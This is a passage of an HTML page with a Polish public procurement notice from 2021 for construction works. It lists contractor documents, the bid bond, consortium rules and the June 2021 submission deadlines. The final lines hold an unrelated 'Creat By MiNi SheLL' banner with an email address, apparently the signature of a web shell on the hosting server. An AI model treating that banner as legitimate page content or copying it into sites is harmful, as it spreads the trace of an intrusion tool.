pkt 2 ppkt 4 SWZ, Zamawiający żąda od Wykonawcy:- wykazu robót budowlanych<br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających,<br/>czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty – według proponowanego wzoru stanowiącego Załącznik<br/>Nr 8 do SWZ;- wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - według<br/>proponowanego wzoru stanowiącego Załącznik Nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, które Wykonawcy muszą złożyć wraz z ofertą:<br/>1) Wypełniony FORMULARZ<br/>OFERTOWY, stanowiący załącznik nr 2 do SWZ. Do oferty należy dołączyć aktualne dokumenty<br/>potwierdzające status prawny Wykonawcy, np. odpis z właściwego rejestru lub z centralnej<br/>ewidencji i informacji o działalności gospodarczej. Oferta nie musi zawierać tych dokumentów<br/>w przypadku wskazania przez Wykonawcę, że są one dostępne w formie elektronicznej pod<br/>określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych.<br/>Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z ww. dokumentów.<br/>FORMULARZ OFERTOWY musi ponadto zawierać oświadczenie Wykonawcy w zakresie<br/>wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.2)<br/>Wypełniony załącznik nr 3 do SWZ, stanowiący oświadczenie, o którym mowa w art. 125 ust. 1<br/>PZP dotyczące odpowiednio: a) Wykonawcy; b) każdego ze wspólników konsorcjum (w<br/>przypadku składania oferty wspólnej) oraz każdego ze wspólników spółki cywilnej; c) podmiotów<br/>„trzecich”, czyli podmiotów, na zasoby których powołuje się Wykonawca w celu spełnienia<br/>warunków udziału w postępowaniu, o których mowa w Rozdziale VIII SWZ oraz przesłanek<br/>wykluczenia z postępowania, o których mowa w art. 108 ust. 1 PZP oraz art. 109 ust. 1 pkt 4<br/>PZP (Rozdział IX SWZ). 3) Zobowiązania podmiotów udostępniających zasoby na które<br/>Wykonawca będzie się powoływał w celu spełniania warunków udziału w postępowaniu, o<br/>których mowa w Rozdziale VIII SWZ. Zgodnie z art. 118 ust. 3 PZP musi złożyć wraz z ofertą<br/>zobowiązania ww. podmiotów do oddania mu do dyspozycji tych zasobów na potrzeby realizacji<br/>zamówienia albo inne podmiotowe środki dowodowe potwierdzające, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zgodnie z art. 118 ust.<br/>4 PZP zobowiązanie podmiotu udostępniającego zasoby, którego wzór stanowi załącznik nr 4<br/>do SWZ, musi potwierdzać, że stosunek łączący Wykonawcę z podmiotami udostępniającymi<br/>zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz musi określać w<br/>szczególności: a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego<br/>zasoby; b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów<br/>podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; c) czy i w jakim zakresie<br/>podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.4)<br/>Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – zgodnie z zał.<br/>Nr 5 do SWZ (jeżeli dotyczy).5) Pełnomocnictwo (jeżeli dotyczy). Upoważnienie osób<br/>podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty.<br/>Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status<br/>prawny Wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału<br/>lub kserokopii potwierdzonej notarialnie, ustanowione do reprezentowania Wykonawcy/ów<br/>ubiegającego/ych się o udzielenie zamówienia publicznego. W przypadku składania oferty<br/>wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) wspólnicy muszą ustanowić<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne<br/>pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego<br/>ze wspólników.6) Dowód wpłaty wadium – zgodnie z postanowieniami Rozdziału XI SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga od Wykonawców wniesienia wadium w wysokości 7 000,00 zł (słownie:<br/>siedem tysięcy złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert, tj.<br/>17.06.2021 r. godz. 11:30 i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z<br/>wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca, żaden ze wspólników konsorcjum (w przypadku składania oferty wspólnej),<br/>żaden ze wspólników spółki cywilnej ani żaden podmiot, na którego zasoby powołuje się<br/>Wykonawca w celu spełnienia warunków udziału w postępowaniu nie może podlegać wykluczeniu z postępowania na podstawie żadnej z przesłanek, o których mowa w art.<br/>108 ust. 1 PZP oraz w art. 109 ust. 1 pkt 4 PZP.<br/>2. Wypełniony załącznik nr 3 do SWZ,<br/>stanowiący oświadczenie, o którym mowa w art. 125 ust. 1 PZP dotyczące odpowiednio: <br/>a) Wykonawcy; b) każdego ze wspólników konsorcjum (w przypadku składania oferty wspólnej)<br/>oraz każdego ze wspólników spółki cywilnej; c) podmiotów „trzecich”, czyli podmiotów, na<br/>zasoby których powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu, o<br/>których mowa w Rozdziale VIII SWZ oraz przesłanek wykluczenia z postępowania, o których<br/>mowa w art. 108 ust. 1 PZP oraz art. 109 ust. 1 pkt 4 PZP (Rozdział IX SWZ). 3. Oświadczenie<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia – zgodnie z zał. Nr 5 do SWZ<br/>(jeżeli dotyczy).<br/>4. Pełnomocnictwo (jeżeli dotyczy). W przypadku składania oferty wspólnej przez<br/>kilku przedsiębiorców (tzw. konsorcjum) wspólnicy muszą ustanowić pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo,<br/>podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy został określony w załączniku Nr 1 do SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-17 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-17 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-16</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com